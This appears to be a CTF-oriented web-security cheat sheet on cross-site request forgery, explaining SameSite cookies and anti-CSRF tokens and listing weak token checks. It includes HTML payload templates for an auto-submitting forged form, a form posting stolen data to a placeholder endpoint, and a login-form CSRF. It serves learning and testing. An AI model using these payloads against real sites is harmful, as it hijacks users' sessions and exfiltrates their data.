Cross-Site Request Forgery

introductiontowebapplications session_security cross-site_request_forgery_prevention csrf_injection csrf_0_protection csp_bypass_inline_code csp_bypass_jsonp samcms

Fundamentally, Cross-Site Request Forgery (CSRF) refers to using the session of a user logged to a website to perform API calls without their consent. For instance, an API call to modify their password.

If a cookie was set with SameSite: None which is not the default, it can be accessed and exploited from any site.

Many modern browsers have built-in anti-CSRF measures, such as with the Content-Security-Policy header (refer to CSP).

XSS is a common attack technique to perform a CSRF attack, by injecting a form that automatically submit itself.

πŸ“š During CTFs, it may take between one and five minutes.

You can find payloads on PayloadsAllTheThings/CSRF. You can test the payload with a HTTP Requests Grabber first during CTFs.

<form id="autosubmit" action="https://<target_form_URL>" method="post">
  <input type="text" name="xxx" value="yyy" hidden>
  <button type="submit">Submit</button>
</form>
<script>
 document.getElementById("autosubmit").submit();
</script>

<form id="fdata" action="//refer/to/stealing/cookies" method="POST">
<input type="hidden" id="data" name="data" value="nop" />
<input type="submit" value="Submit" />
</form>
<script defer>
document.getElementById('data').value='stolen data';
document.getElementById('fdata').submit();
</script>

Anti-CSRF Token

sqlmapessentials session_security gitlabcve20237028 unbakedpie

Some websites have a CSRF token, mostly attached to HTML forms, as a form of protection against CSRF attacks and other automation tools.

It's a generated value that is added to the form, often as a hidden HTML <input> field. It proves that someone submitting a form effectively visited the page with the form beforehand.

CSRF tokens should be randomly generated. Do not use md5(username) or similar guessable token generation functions.

Many tools have built-in switches to handle/bypass such forms.

A few other inappropriate settings

  • The server only checks if the header is present
  • The server only checks if the length of the token
  • The server only checks the token if it was sent
  • We can use someone else's CSRF token
  • We can reuse a CSRF token
  • Verb tampering may bypass CSRF verification

There is also the Double-Submit Cookie Pattern but it can be bypassed by giving an arbitrary value to both the cookie and the header.

Additional Payloads

Login form

<form id="autosubmit" action="URL" method="post">
<input name="username" value="toto">
<input name="password" value="toto">
<button type="submit" class="btn btn-default">Submit</button>
</form>